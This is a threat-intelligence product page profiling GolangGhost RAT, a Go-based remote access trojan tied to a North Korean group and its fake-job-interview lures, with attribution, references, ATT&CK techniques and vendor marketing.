GolangGhost RAT
GoLangGhost RAT is a Go-based remote access trojan first observed in the wild around February 2025. It is identified in the provided content as the predecessor to PyLangGhost RAT, indicating the malware codebase was later ported from Go to Python by May 2025. The malware is associated with the North Korean government-linked threat group NICKEL ALLEY, also referred to in reporting on the Contagious Interview campaign. In that broader campaign, operators used fake job opportunities, fraudulent company personas, fake LinkedIn pages, GitHub repositories, and developer-focused lures to target technology and Web3 professionals. The content specifically states that GoLangGhost RAT preceded PyLangGhost RAT, but does not directly describe a distinct GoLangGhost-specific infection chain or unique technical differences beyond its Go implementation. Based on the direct relationship stated in the content, the successor PyLangGhost RAT supports arbitrary command execution, file exfiltration, system profiling, browser credential theft, cookie theft, and theft of Chrome cryptocurrency wallet extension data; however, the content does not explicitly confirm that every one of these capabilities was present in the earlier GoLangGhost RAT variant. No GoLangGhost-specific indicators of compromise are provided in the content.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
PyLangGhost RAT was preceded by a GoLang-based version known as GoLangGhost RAT. Samples of GoLangGhost RAT were first observed in the wild around February 2025.
References FlexibleFerret: macOS Malware Deploys in Fake Job Scams [[URL_079a8396_137]] Famous Chollima deploying Python version of GolangGhost RAT [[URL_079a8396_138]]
Techniques & procedures
3 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
2 techniquesThis involved the attacker-controlled web interface presenting an error informing the victim that they must run a command locally to fix the issue – a command that instead initiated a series of actions leading to PyLangGhost RAT.
This involved the attacker-controlled web interface presenting an error informing the victim that they must run a command locally to fix the issue – a command that instead initiated a series of actions leading to PyLangGhost RAT.
Command and Control
1 techniqueOrganizations should monitor command execution and network traffic that spawns from Node.js processes, as it may indicate malware retrieval.
Recent activity
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Go-based predecessor to PyLangGhost RAT, apparently ported later into Python as PyLangGhost.
References FlexibleFerret: macOS Malware Deploys in Fake Job Scams [[URL_079a8396_137]] Famous Chollima deploying Python version of GolangGhost RAT [[URL_079a8396_138]]
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.